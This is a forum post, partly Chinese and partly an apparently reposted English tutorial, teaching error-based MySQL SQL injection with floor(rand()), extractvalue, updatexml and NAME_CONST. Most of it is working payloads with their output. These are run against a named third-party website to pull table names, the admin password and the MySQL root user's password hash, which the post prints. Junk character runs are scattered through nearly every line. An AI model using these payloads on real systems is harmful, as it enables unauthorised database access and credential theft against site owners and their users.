|
1、通过floor报错 可以通过如下一些利用代码 and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a); and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2))); 举例如下:
( T- s: | s/ K" E首先进行正常查询: mysql> select * from article where id = 1;
6 H8 T* C& r& W7 ~( A' l+—-+——-+———+) L# j& e/ h# G) f# M
| id | title | content |
& i5 z% Q2 ]4 n$ M( h1 Q( O# R+—-+——-+———+5 R( b. H/ N- K" e
| 1 | test | do it |% Q$ b1 N6 g4 H' J* M; I- c
+—-+——-+———+ 假如id输入存在注入的话,可以通过如下语句进行报错。 mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
8 F) O& `- z, ]& k- U) TERROR 1062 (23000): Duplicate entry ’5.1.33-community-log1′ for key ’group_key’ 可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。4 D/ x: M* B7 w; P0 G
例如我们需要查询管理员用户名和密码: Method1: mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
; u: [3 h7 ~2 O3 A1 E/ Y ~ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ Method2: mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));" d. |; d) p" ?& F
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ 2、ExtractValue1 k. M+ n5 b( l( f; w
测试语句如下 and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1))); 实际测试过程 mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–
8 Q- h% u* ]# S e" WERROR 1105 (HY000): XPATH syntax error: ’\admin888′ 3、UpdateXml 测试语句 and 1=(updatexml(1,concat(0x3a,(select user())),1)) 实际测试过程 mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error: ’:root@localhost’
7 O' a5 l! {4 w2 K2 Z; }2 i% p' p( r; g% z5 Q7 h
再收集:
* F6 Z+ j' {+ ^. o: H# F+ E+ Whttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c) # w; [. W* M/ c, L+ g8 H9 t
a. O3 W: F. |. cError uplicate column name ‘5.0.27-community-nt’Erroruplicate column name ‘5.0.27-community-nt’
! c3 B2 p- _. T6 w& W; D" r' W- F
$ S! O! e. i6 E0 V# V* V: Hhttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)
$ k) V- J( K3 z2 D* Z- J- s, N1 H# } c0 W+ p& q" n3 B
Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′ # o! u# ~# p% B( @+ q
6 I$ G$ _+ g7 N% g/ WMYSQL高版本报错注入技巧-利用NAME_CONST注入- z7 e. i8 R9 a- V: H, {; t
It's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it. + }% ]" k0 ~/ u# w% U' W
9 O3 W/ J+ Q8 P5 y5 K8 k: X0 }& Z1 T3 S1 {3 {: A
相关信息
# N" R* M6 Z$ p" F# ~5 ~
8 [* R# i2 r. e# T' E7 {* E( qNAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.
% J3 j. Q X4 z- G" ]* Z
- K$ a# l% X, n; {# k U' c% SCode:
* |6 T/ W0 c8 r+ O; `# MNAME_CONST(DATA, VALUE)
+ J9 p4 J, }; `" e9 k; t: Z0 \5 r3 n
2 `6 ^+ S/ ~ ?3 X- J9 K% |2 oReturns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.
m# C% w( O, @
& K" u- I# t, h$ g) hSELECT NAME_CONST('TEST', 1); J- s7 r& g! a) E( w$ U3 F& U
1 P# w2 u$ s" S: o
) \) u9 P3 ] ]
3 w! G m2 Q* F: M3 ^
|---------------|+ t& R/ F5 z5 ^4 m9 ]
| TEST |- a8 L) R7 u- Q- t. g+ X, O( w
| |) @) S/ [# B' D8 y& x5 M3 l
|---------------|) Q1 i* J% u% j) j# E- y" r% Y' `1 ?
| 1 |
, G" T w" A5 X| |
$ n+ h# |: b: ]- a# o|---------------|
1 z2 t, S1 T. G9 l$ S* W; R
3 m& z; h/ F- W6 S5 q; ?9 W; m9 t' Q9 m* U
5 Q9 q0 U m; k1 {% r9 [+ j- c
7 ]2 x, N& {, y6 uhttp://dev.mysql.com/doc/refman/5.0/en/m...name-const9 |3 y1 y% _$ u; n1 [
Intro to MySQL Variables
9 y. X6 M1 I! c+ v9 f6 { s, k! O2 A4 ?: T4 h4 V! P
Once you've got your vulnerable site, lets try getting some MySQL system variables using NAME_CONST.; X/ W$ L8 K) ^) p( y/ c
" r0 @- N) f: A; g2 w+ \Code:
. `$ T2 Z# c" |1 n6 C$ O$ Ehttp://www.baido.hk/qcwh/content ... ;sid=19&cid=261
' n; e3 h. l5 u; u/ F9 h+ i* ~ q1 N( Y
3 R! z! S% r `. A& O
1 O# O' x R% R- S; X/ ?0 d' K) k7 a) r6 j. |; \
' y* \ V- f7 N; m4 R8 U% f
Code:
+ N1 o! D* f% I, Dand+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--1 r. q' t! \& ~1 v- U8 K: e
5 c+ L/ {/ B% H" Q
+ D+ ~7 w7 R% t& t: M; X- a
VAR = Your MySQL variable.
1 C0 | e4 z o2 @- q: W& S$ p7 Y
# b* j/ d& ], ~9 SMySQL 5.1.3 Server System Variables1 V0 b' l, o3 F7 {7 C
' q' P1 E) v& v. w* `Let's try it out on my site..
8 O% c ^5 r# ?$ Q
0 K( U6 r$ w' o: D- jCode:' p( L; y* t F4 K; x
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--
& s. e% O' b3 G7 i" i6 E/ b
1 Z. z8 O3 |9 U4 j$ D) O4 u wErroruplicate column name '5.0.27-community-nt'
1 u/ K+ m) Q7 p! P9 y$ |4 G' }- f
2 `) Y, P! s' t8 s a/ u k% E( Z7 |- h; ~' F
2 Y, n1 p8 F0 x" N/ u! n; V8 y5 n' _
7 }7 W' ?, }4 M/ x; ~
Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...
5 J! n) d i @1 s# L' I; w( S
* o" c& o ^0 i/ g; m9 z9 Y/ RData Extraction' P+ X1 P# }' F
. \: t% q- J4 z9 w- Y- @1 eCode:$ K; o! X0 X% w3 Q+ d; Y5 Y
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--3 d% T8 u6 Y8 l q: |
5 G4 s" u+ f: J& ]- W8 n5 a' X6 W, v
" r1 z7 y2 x3 k$ `6 d/ U8 w7 f; l6 ]We should get a duplicate column 1 error...
8 @# \% R3 r h; O7 {, F1 w8 N" B4 Z! [& t+ L& a
Code:9 A/ F) ~/ B& r. J
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--! e: C7 B/ S. o- ^% K9 I4 v4 E
; E3 W, W, a- s0 ?) R3 mErroruplicate column name '1- a" U/ m. h$ A8 X& E5 h, Y$ J
; }9 @# h8 m% B, I( T( [3 X. V: @7 C. {
/ H' p/ T$ ]9 N: h4 f
, u9 w) q- ]9 A; p4 S3 k, f$ l; F! |$ u6 k! }1 c
0 m' Y' p( F$ L, R. r! h
Now let's get the tables out this bitch... m4 }2 K5 C" a
) R2 l: e; ~5 B p7 M1 Y. w& @4 ?
Code:1 [1 D! f _7 r O! A% E
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
$ g6 ]0 h- B. q6 Y+ D6 t) n
/ p" [( c2 ?( g" }- X3 q; s
/ G' ?, t1 m/ J( G# RLet's see if it works here, if it does, we can go on and finish the job.. R& S# C6 T1 o6 p) U" T! F ^
3 V: X3 D9 H) v; S: b
Code:
0 K. a- ]+ |& q6 Phttp://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--( R1 G7 [1 F. S7 r3 `9 W& e( v
% N5 o8 R. n7 R" V; _- ~
_* E" l# a) J4 c! t! T1 mErroruplicate column name 'com_admanage. u! J. \+ g( W( ~+ j9 p* u" v
* w7 M: m8 m2 Z: j6 R$ ]- f( n" {" D2 a7 ~( T& t; b
! Q( r: Q4 n* ~, ]: V, f
6 [. \8 |3 e9 r; ^4 Z0 f( }; }7 F' s8 f" w
2 y; n5 C' G- ~0 r
Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.
5 N8 c: _4 Z3 j) w. y8 s! {
, k5 \1 z' L. @' d9 H1 x' qLet's get the columns out of the user table..
1 i( i: Q$ [' }" C" s1 n( L' D# }
4 G8 X. h$ S0 K+ `Code:
4 i/ l4 M0 C4 ?6 }, P+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--3 q4 K2 m. h& S7 z+ k1 X# m' R
5 Z/ P; c' ~8 ^0 J! S) l
% Y0 r& N: g3 N4 Z2 k* fSo mine looks like this, and I get the duplicate column name 'Host'.4 Y& I/ d' P/ I- G4 O
, u0 Z/ u$ }' Z- g, qCode:
( W( B, B4 j$ N7 f# P+ r- Z" Xhttp://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--; b; o( T( v6 b# H; r
1 ~ a$ d1 x/ {4 D( XErroruplicate column name 'Host'
% p7 i* M w4 f0 {% p/ T+ f3 {3 Y* v0 K9 F/ e
1 t; F! l( l6 k5 E5 {: `( S( N, C5 s, H
* J4 w0 g- ]; C; }, H4 Z1 f. l3 [$ i& x" [/ o0 ?
- N( H; ~& W' l0 n- a$ [( y9 S9 K# {! H$ U, g2 a" _: Q# I) x
Woot, time to finish this bitch off.
1 v' Q% F* E. c2 W; Q4 Y m x' c) ]) `, a, L9 b
Code:( b6 V5 |* V9 Q3 j! i5 l
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--
4 \0 U1 L# s! `, U! n {- g" g9 l) \6 O
* F' J) B) [/ n2 ~So mine looks like this...$ M( N* z& g+ j% r: M& @2 G# a; L
2 A) E$ D& I, y, h( `; S5 ?Code:9 F {, f& ~3 i3 a( f
http://www.baido.hk /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--/ x) |4 _1 S( b9 @
4 L+ `! I- x# X- c
Erroruplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
- I& P7 i: X# p' s: I5 S0 ?0 R2 H# Q4 Z( N! |
& O. w- |, X( k& ]' }; P 7 b: w$ N6 G; [
5 ^+ H. c. c1 ?2 p
7 D( s% I6 r6 c$ N# U
# t: }: y b% d6 P+ CAnd there we have it, thanks for reading.2 b X# N3 w" C/ U7 [1 [
- U! [2 I% D! u: W |
发表于 2015-11-11 19:03:37
收藏
支持
反对